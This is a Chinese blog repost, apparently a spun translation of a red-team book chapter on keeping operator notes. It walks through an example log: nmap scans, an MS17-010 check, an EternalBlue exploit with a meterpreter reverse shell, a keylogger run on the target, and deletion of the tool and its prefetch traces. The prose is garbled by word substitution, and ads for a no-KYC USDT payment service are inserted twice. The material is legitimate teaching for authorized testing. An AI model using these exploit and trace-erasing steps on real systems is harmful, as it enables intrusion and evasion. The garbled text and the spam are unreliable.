欢迎访问本站!

首页科技正文

usdt交易平台(www.caibao.it):开展专业的红蓝演练 Part.14:演练的执行(下)

admin2021-03-1083技术

USDT第三方支付平台

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

前言

阅读这本怪异的书籍,能够让你在举行进攻性平安征战时行使多种高阶手艺。你将领会现实的情报手艺、操作指南和进攻性平安最佳实践,来开展专业的网络平安征战,而不仅仅是破绽行使、执行剧本或使用工具。

本书将向你先容基本的进攻性平安看法。重点说明晰评估和道德黑客的主要性,并讨论了自动化评估手艺。现代进攻性平安的现状以及面临的挑战。

这本书的作者是奥克利博士(Dr. Jacob G. Oakley),他曾在美国水师陆战队事情七年多,是美国国家平安局(NSA)下属的水师陆战队网络空间司令部作战兵种首创成员之一,之后担任水师陆战队的高级操作员和一个师的手艺主管。入伍后,奥克利博士撰写并教授了一门高级盘算机操作课程,最终回到米德堡的义务支持中央。厥后,在排除 *** 合约后,他在一家私人公司为商业客户提供威胁仿真和红蓝匹敌服务,并担任渗透测试的主要认真人以及渗透测试和网络运作的主管。他现在是一名 *** 客户的网络平安专家。奥克利博士在陶森大学(Towson University)完成了信息手艺博士学位,主要研究和开发进攻性网络平安方式。他是迈克·奥利里(Mike O 'Leary)所著《网络行动,第二版》(Cyber Operations, second edition)一书的手艺谈论员。

系列文章目录:

开展专业的红蓝演练 Part.1:演练目的及形式

开展专业的红蓝演练 Part.2:红蓝演练的优点及作用

开展专业的红蓝演练 Part.3:红蓝演练的瑕玷”

开展专业的红蓝演练 Part.4:论红队的自动化方式

开展专业的红蓝演练 Part.5:论红队自动化的优劣

开展专业的红蓝演练 Part.6:进攻性平安的现状

开展专业的红蓝演练 Part.7:进攻性平安面临的挑战(上)

开展专业的红蓝演练 Part.8:进攻性平安面临的挑战(下)

开展专业的红蓝演练 Part.9:演练局限简直定(上)

开展专业的红蓝演练 Part.10:演练局限简直定(下)

开展专业的红蓝演练 Part.11:演练规则(上)

开展专业的红蓝演练 Part.12:演练规则(下)

开展专业的红蓝演练 Part.13:演练的执行(上)

在前面几个章节中,我们用大量的篇幅和内容讨论了红蓝演练的优瑕玷、面临的挑战、若何确定演练的局限以及演练应该遵守的规则。住手现在,我们还没有真正提议演练流动的执行。我们将用两个章节的篇幅单独讨论在演练执行历程中需要主要的事项。在上一个章节中,我们针对演练执行需要关注的职员放置和最终确认做了详细的讨论并给出了最佳实践。在本文中,我们将关注若何纪录演练历程,我称之为作战条记,在文末我还给出了建议使用的条记花样。

作战条记

在所有优异的黑客最不善于做的事情中,做好操作纪录可能是最主要的。这是不幸的,由于在红队评估时代,优越的作战条记可能是最有用的工具之一。作战条记有助于在更大的团队中举行协作息争决问题;它们有助于保持客户和评估职员的向导层对红队流动的领会,而且它们是优越讲述的组成部门,有助于组织缓解评估效果。详细的作战条记也有助于珍爱评估职员免受重大过失或欠妥行为的指控。作战条记应纪录所有流动,并应附有流动的时间戳和说明。 在我所做的评估简报中,当我讨论我们的一些破绽行使和跳转攻击流动时,在场的监控职员的脸上露出了惊讶的神色。在简短谈话之后,他们找到我,问我是否有更详细的信息,关于我从那里提议攻击,什么时刻提议的攻击以及拿到了哪些特定的主机,由于他们确信我应该向他们见告我的流动。行使我写的详细的作战条记,我能够给他们这些特定的信息,这样他们就可以研究他们的日志和网络流量数据,实验关联我的操作行为。最后,他们意识到他们甚至没有相关的数据,更不用说警报了,我们发现他们实行了几回不准确的网络监听。若是没有专业的作战条记,这一改善本组织平安状态的主要步骤是不能能的做到的。

除了辅助客户组织之外,好的条记还允许评估职员快速确定某些日志或其他系统工件是否与其在差异主机上的操作相关。在协作团队评估时代尤其云云,由于一次评估可能会有好几小我私人在组织中流动。能够依赖所有相关职员举行的有条理和尺度化的作战条记,使每小我私人保持一致,并允许一个评估职员提醒另一个评估职员他们的行为可能导致问题或被检测到。在发现危害指标的情形下,让客户组织随时可以使用这些条记,可以加速消除红队的冲突和真正的恶意流动。一个在破晓三点打来的手忙脚乱的电话,通过挖掘什么日志可能发生在评估攻击主机上,以确定该组织中的日志是红队的操作照样真正的黑客所为,这不是很专业,也不是很有趣的事情。 涵盖系统交互的作战条记大致分为四个步骤:枚举和破绽行使、后接见感知、系统操作和脱离目的。下面我们将讨论在攻击系统的最先到竣事历程中需要注重的主要事项以及若何注重这些事项。该形貌不包罗所有内容,其他条目可能对照合适,但这是红队作战条记的最低要求,同时我还提供了一个示例花样。

1)枚举与行使

,

usdt收款平台

菜宝钱包(www.caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

,

作战条记中应涵盖所有枚举和破绽行使流动,并提供足够详细的信息,以领会评估职员在做什么。红队成员可能做的第一件事就是使用工具扫描网络,寻找潜在目的。时间戳、扫描源和用于启动扫描的下令应放在条记中:

11:52 AM 8/19/2018 from 192.168.96.4 running nmap -sS -p 22,445,3389,80,443 192.168.97.0/24

假设这个下令发现主机 192.168.97.128 的 445 端口是打开的,而且评估职员确定这个主机是一个不错的目的,然则想要找出它正在运行的操作系统,以便选择适当的攻击载荷。 在这里,主要的是要包罗响应的相关部门,以便后续评估职员或效果讲述以及简报在需要时可以举行参考:

11:58 AM 8/19/2018 from 192.168.96.4 running nmap -O -v 192.168.97.128
Aggressive OS guesses: Microsoft Windows 10 1703 (92

接下来,评估职员确定,由于缺少凭证,唯一可用的远程攻击是 MS17-010 SMBv1 攻击,他们需要确保系统没有针对这一破绽打过补丁,以免确立异常的攻击流量:

12:10 PM 8/19/2018 from 192.168.96.4 nmap -Pn -p445 -script  *** b-vuln- ms17-010 -v 192.168.97.128
 *** b-vuln-ms17-010:
VULNERABLE:
Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
State: VULNERABLE
IDs: CVE:CVE-2017-0143
Risk factor: HIGH
A critical remote code execution vulnerability exists in Microsoft SMBv1
servers (ms17-010).

确定目的系统192.168.97.128易受攻击后,评估职员继续行使该破绽。条记中包罗为前面每个下令公然的信息是很主要的,以及特定于行使破绽的特定信息,例如所使用的有用载荷:

12:14 PM 8/19/2018 from 192.168.96.4 msf exploit(ms17_010_eternalblue) >
exploit against 192.168.97.128 on TCP port 445 with the following payload
option: (windows/x64/meterpreter/reverse_https) and a locally listening
port of 443
[+] 192.168.97.128:445 - ETERNALBLUE overwrite completed successfully
(0xC000000D)!
[*] Meterpreter session 1 opened (192.168.96.4:443 -> 192.168.97.128:63687)

2)后接见感知

作战条记的下一部门涉及评估职员接纳的后接见操作,首先是与远程目的交互。以下下令组成对新远程环境的优越态势感知:

12:15 PM 8/19/2018 on 192.168.97.128 meterpreter >getuid
Server username: NT AUTHORITY\\SYSTEM

此条记告诉评估职员他们能够通过远程攻击所实现的上下文,以及在目的上是否需要升级特权。

12:16 PM 8/19/2018 on 192.168.97.128 meterpreter > sysinfo
meterpreter > sysinfo
Computer        : DOVERGUBBEN
OS              : Windows 10
Architecture    : x64
System Language : en_US
Domain          : TROLLHOME
Logged On Users : 2
Meterpreter     : x64/windows

这些条记告诉评估职员一些关于态势感知的异常主要的信息。上面的信息解释晰安装在操作系统上的语言包(可能会影响某些破绽行使和工具)以及登录的用户数。我们看到有两个用户,评估职员可能想确定他们是否是治理员,他们可能更领会平安性,而且可能更领会攻击者在盘算机上的存在。评估职员首先使用工具天生 shell,然后与内陆系统下令举行交互:

12:17 PM 8/19/2018 on 192.168.97.128 meterpreter > shell
Process 1775 created.
12:18 PM 8/19/2018 on 192.168.97.128 query user
 USERNAME       SESSIONNAME  ID  STATE    IDLE TIME
>Administrator  console      1    Active  none
LOGON TIME
8/19/2018 12:05 PM

此下令示意治理员已登录,而且在执行破绽行使时已经登录。我们还可以看到治理员是流动的而不是空闲的。这一定会影响系统上流动的可接受风险。此下令发生的信息可能会受到虚拟机挂起和还原功效的影响,因此请始终记着这一点。鉴于虚拟化越来越盛行,评估职员应该知道空闲时间尤其会受到影响。 接下来,评估职员想知道新目的上现在是什么时间。若是评估职员在攻击后举行整理以保持隐藏性,或者需要在简报中解决与监控实体的冲突,那么目的时间在关联日志纪录和监控流动时异常主要。许多组织都有国际界限,数据中央漫衍在多个地方,尤其是由于云服务的介入。例如,一家位于美国的公司可以在爱尔兰的 AWS 集群中托管装备。若是下令的时间戳和当前系统时间是关闭的,那么评估员需要记着这一点。

12:20 PM 8/19/2018 on 192.168.97.128 time
The current time is: 12:20:22.12

由于系统上的时间和攻击系统上的时间之间没有显著的误差,评估职员可以以为作战条记中的任何带时间戳的信息都应该与目的系统上的事宜亲热相关。 为了继续获得目的的态势感知,评估职员需要领会流动的历程和毗邻。这些下令的输出很长,以是在这里我对效果举行了裁剪:

12:23 PM 8/19/2018 on 192.168.97.128 tasklist
Image Name         PID Session Name        Session, Mem Usage
========================= ======== ================ ===========
System Idle Process	0 Services			    	0             8 K
System				      4 Services			    	0		        140 K
Registry           88 Services            0         8,692 K
 *** ss.exe          328 Services            0           992 K
csrss.exe         444 Services            0         4,644 K
csrss.exe         520 Console             1         4,540 K 
wininit.exe       540 Services            0         5,884 K
winlogon.exe      584 Services            0         9,380 K
services.exe      656 Services            0         8,472 K
lsass.exe         672 Services            0        14,968 K
svchost.exe       792 Services            0         3,556 K  
cmd.exe          1775 Services            0        27,376 K  
dwm.exe           516 Console             1        88,240 K 
tasklist.exe     3688 Console             1         7,476

在目的的这个历程列表中,评估职员会注重到在 cmd.exe 中确立的 shell 也泛起在列表中了,并关注三个点。对历程的快速观察显示是否有平安软件捕捉了接见破绽或将捕捉进一步的操作。接下来,评估职员寻找可能在此主机或其他主机上提供分外攻击面的潜在历程。最后,评估职员查找历程,这些历程指示盘算机是否被恶意主机损坏。纵然在评估时代,红队成员也是组织系统战壕中的主要防线。这三点相同的缘故原由剖析也适用于系统上监听的端口,以确定通讯历程:

12:26 PM 8/19/2018 on 192.168.97.128 netstat -ano
Active Connections
Proto  Local Address            Foreign Address     State         PID
TCP    0.0.0.0:135              0.0.0.0:0           LISTENING     980
TCP    0.0.0.0:445              0.0.0.0:0           LISTENING     4
TCP    0.0.0.0:1536             0.0.0.0:0           LISTENING     540
TCP    0.0.0.0:1537             0.0.0.0:0           LISTENING     1332
TCP    0.0.0.0:1538             0.0.0.0:0           LISTENING     1400
TCP    0.0.0.0:1539             0.0.0.0:0           LISTENING     672
TCP    0.0.0.0:1540             0.0.0.0:0           LISTENING     2660
TCP    0.0.0.0:1541             0.0.0.0:0           LISTENING     656
TCP    0.0.0.0:1640             0.0.0.0:0           LISTENING     8428
TCP    0.0.0.0:5040             0.0.0.0:0           LISTENING     5480
TCP    169.254.105.111:139      0.0.0.0:0           LISTENING     4
TCP    192.168.97.128:139       0.0.0.0:0           LISTENING     4
TCP    192.168.97.128:1719      192.168.96.4:443    ESTABLISHED   3160

在这里,评估职员看到了与远程接见工具包相关的毗邻,并通过 443 端口与攻击系统举行了通讯。在系统内陆天生的shell中使用这些下令时,请务必记着,tasklist和netstat等下令通常被恶意软件操作或替换,以便在用户运行时隐藏输出。因此,看到这些下令没有可疑之处并不能保证机械没有熏染非红队的恶意软件。

3)系统操作

当远程系统获得态势感知时,评估职员可能必须对目的举行一些操作,以继续举行攻击模拟流动。这方面的一个常见且需要的例子是特权提升。若是用于接见 Windows 盘算机的破绽未导致类似 MS17-010 的系统上下文,该怎么办?或者,若是我们只是需要执行自己的 .exe文件,它可能是一个键盘纪录器呢?例如,假设我们将键纪录器放置在目的系统上的 C:\windows\system32\ 文件夹中的 nastyknife.exe 文件。首先,我们要确保它乐成地到达目的文件系统,然后再执行:

12:26 PM 8/19/2018 on 192.168.97.128 dir C:\\windows\\system32\\nastyknife.exe
8/19/2018  12:25 PM            27,648 nastyknife.exe
               1 File(s)       27,648 bytes
12:27 PM 8/19/2018 on 192.168.97.128 C:\\windows\\system32\\nastyknife.exe

在工具完成运行之后,也许我们需要自己整理,这样治理员就很难找到我们了。这是一种非经常见的对目的系统举行文件操作的形式,以使红队能够隐身。

12:43 PM 8/19/2018 on 192.168.97.128 del C:\\windows\\system32\\nastyknife.exe
12:44 PM 8/19/2018 on 192.168.97.128 dir C:\\windows\\system32\\nastyknife.exe
File Not Found

作为攻击者,除了删除工具自己之外,我们可能还必须祛除系统确立的工件,这些工件可能解释我们在目的上运行了某些器械。例如 Windows prefetch 文件夹,它跟踪最近运行的软件。以下输出显示了这一点:

12:45 PM 8/19/2018 on 192.168.97.128 dir C:\\windows\\prefetch
08/19/2018 12:07 PM             14,645 NASTYKNIFE.pf

我们一定要删除对我们工具的引用:

12:47 PM 8/19/2018 on 192.168.97.128 del C:\\windows\\prefetch\\[nastyknife.pf]()
12:48 PM 8/19/2018 on 192.168.97.128 dir C:\\windows\\prefetch\\nastyknife.pf
File Not Found

4)脱离目的

现在我们已经把我们在系统上留下的痕迹整理清洁了,我们另有最后一个条目要写进作战条记,那就是我们完成了目的的流动。

12:51 PM 8/19/2018 off target

作战条记示例

以下是为本章所整理的作战条记示例。显然,每个评估职员可能包罗差其余输出以及差异部门。对于netstat和tasklist等具有长输出的下令,评估职员可以简朴地为下令的执行时间做一个时间戳,并包罗对异常情形的注释(若是有的话)。此外,他们可能会注重到与自己的流动有关的信息,例如评估职员启动的 cmd.exe 和用于查看远程接见工具通讯的 netstat 条目。

11:52 AM 8/19/2018 from 192.168.96.4 running nmap -sS -p 22,445,3389,80,443 192.168.97.0/24
11:58 AM 8/19/2018 from 192.168.96.4 running nmap -O -v 192.168.97.128
Aggressive OS guesses: Microsoft Windows 10 1703 (92%)
12:10 PM 8/19/2018 from 192.168.96.4 nmap -Pn -p445 -script  *** b-vuln- ms17-010 -v 192.168.97.128
 *** b-vuln-ms17-010:
VULNERABLE:
Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
State: VULNERABLE
IDs: CVE:CVE-2017-0143
Risk factor: HIGH
A critical remote code execution vulnerability exists in Microsoft SMBv1
servers (ms17-010).
12:14 PM 8/19/2018 from 192.168.96.4 msf exploit(ms17_010_eternalblue) >
exploit against 192.168.97.128 on TCP port 445 with the following payload
option: (windows/x64/meterpreter/reverse_https) and a locally listening
port of 443
[+] 192.168.97.128:445 - ETERNALBLUE overwrite completed successfully
(0xC000000D)!
[*] Meterpreter session 1 opened (192.168.96.4:443 -> 192.168.97.128:63687)
12:15 PM 8/19/2018 on 192.168.97.128 meterpreter >getuid
Server username: NT AUTHORITY\\SYSTEM
12:16 PM 8/19/2018 on 192.168.97.128 meterpreter > sysinfo
meterpreter > sysinfo
Computer        : DOVERGUBBEN
OS              : Windows 10
Architecture    : x64
System Language : en_US
Domain          : TROLLHOME
Logged On Users : 2
Meterpreter     : x64/windows
12:17 PM 8/19/2018 on 192.168.97.128 meterpreter > shell
Process 1775 created.
12:18 PM 8/19/2018 on 192.168.97.128 query user
USERNAME        SESSIONNAME  ID  STATE     IDLE TIME
>Administrator  console      1   Active    none
12:20 PM 8/19/2018 on 192.168.97.128 time
The current time is: 12:20:22.12
12:23 PM 8/19/2018 on 192.168.97.128 tasklist
Image Name         PID Session Name        Session, Mem Usage
========================= ======== ================ ===========
System Idle Process	0 Services			    	0             8 K
System				      4 Services			    	0		        140 K
Registry           88 Services            0         8,692 K
 *** ss.exe          328 Services            0           992 K
csrss.exe         444 Services            0         4,644 K
csrss.exe         520 Console             1         4,540 K 
wininit.exe       540 Services            0         5,884 K
winlogon.exe      584 Services            0         9,380 K
services.exe      656 Services            0         8,472 K
lsass.exe         672 Services            0        14,968 K
svchost.exe       792 Services            0         3,556 K  
cmd.exe          1775 Services            0        27,376 K  
dwm.exe           516 Console             1        88,240 K 
tasklist.exe     3688 Console             1         7,476  

12:26 PM 8/19/2018 on 192.168.97.128 netstat -ano
Active Connections
Proto  Local Address            Foreign Address     State         PID
TCP    0.0.0.0:135              0.0.0.0:0           LISTENING     980
TCP    0.0.0.0:445              0.0.0.0:0           LISTENING     4
TCP    0.0.0.0:1536             0.0.0.0:0           LISTENING     540
TCP    0.0.0.0:1537             0.0.0.0:0           LISTENING     1332
TCP    0.0.0.0:1538             0.0.0.0:0           LISTENING     1400
TCP    0.0.0.0:1539             0.0.0.0:0           LISTENING     672
TCP    0.0.0.0:1540             0.0.0.0:0           LISTENING     2660
TCP    0.0.0.0:1541             0.0.0.0:0           LISTENING     656
TCP    0.0.0.0:1640             0.0.0.0:0           LISTENING     8428
TCP    0.0.0.0:5040             0.0.0.0:0           LISTENING     5480
TCP    169.254.105.111:139      0.0.0.0:0           LISTENING     4
TCP    192.168.97.128:139       0.0.0.0:0           LISTENING     4
TCP    192.168.97.128:1719      192.168.96.4:443    ESTABLISHED   3160

12:26 PM 8/19/2018 on 192.168.97.128 dir C:\\windows\\system32\\nastyknife.exe
8/19/2018  12:25 PM            27,648 nastyknife.exe
1 File(s)         27,648 bytes
12:27 PM 8/19/2018 on 192.168.97.128 C:\\windows\\system32\\nastyknife.exe
12:43 PM 8/19/2018 on 192.168.97.128 del C:\\windows\\system32\\nastyknife.exe
12:44 PM 8/19/2018 on 192.168.97.128 dir C:\\windows\\system32\\nastyknife.exe
File Not Found
12:45 PM 8/19/2018 on 192.168.97.128 dir C:\\windows\\prefetch
08/19/2018 12:27 PM             14,645 NASTYKNIFE.pf
12:47 PM 8/19/2018 on 192.168.97.128 del C:\\windows\\prefetch\\nastyknife.pf
12:48 PM 8/19/2018 on 192.168.97.128 dir C:\\windows\\prefetch\\nastyknife.pf
File Not Found
12:51 PM 8/19/2018 off target

总结

你现在应该明了,除了简朴地枚举和攻击目的之外,你应该领会执行专业红队评估所需的内容。此外,我还重点先容了专业红队的特点,如最佳实践和优越的情报手艺,并讨论了若何使专业黑客成为可能。

参考及泉源:https://www.springer.com/us/book/9781484243084

本文由作者“丝绸之路”整剃头布,:

网友评论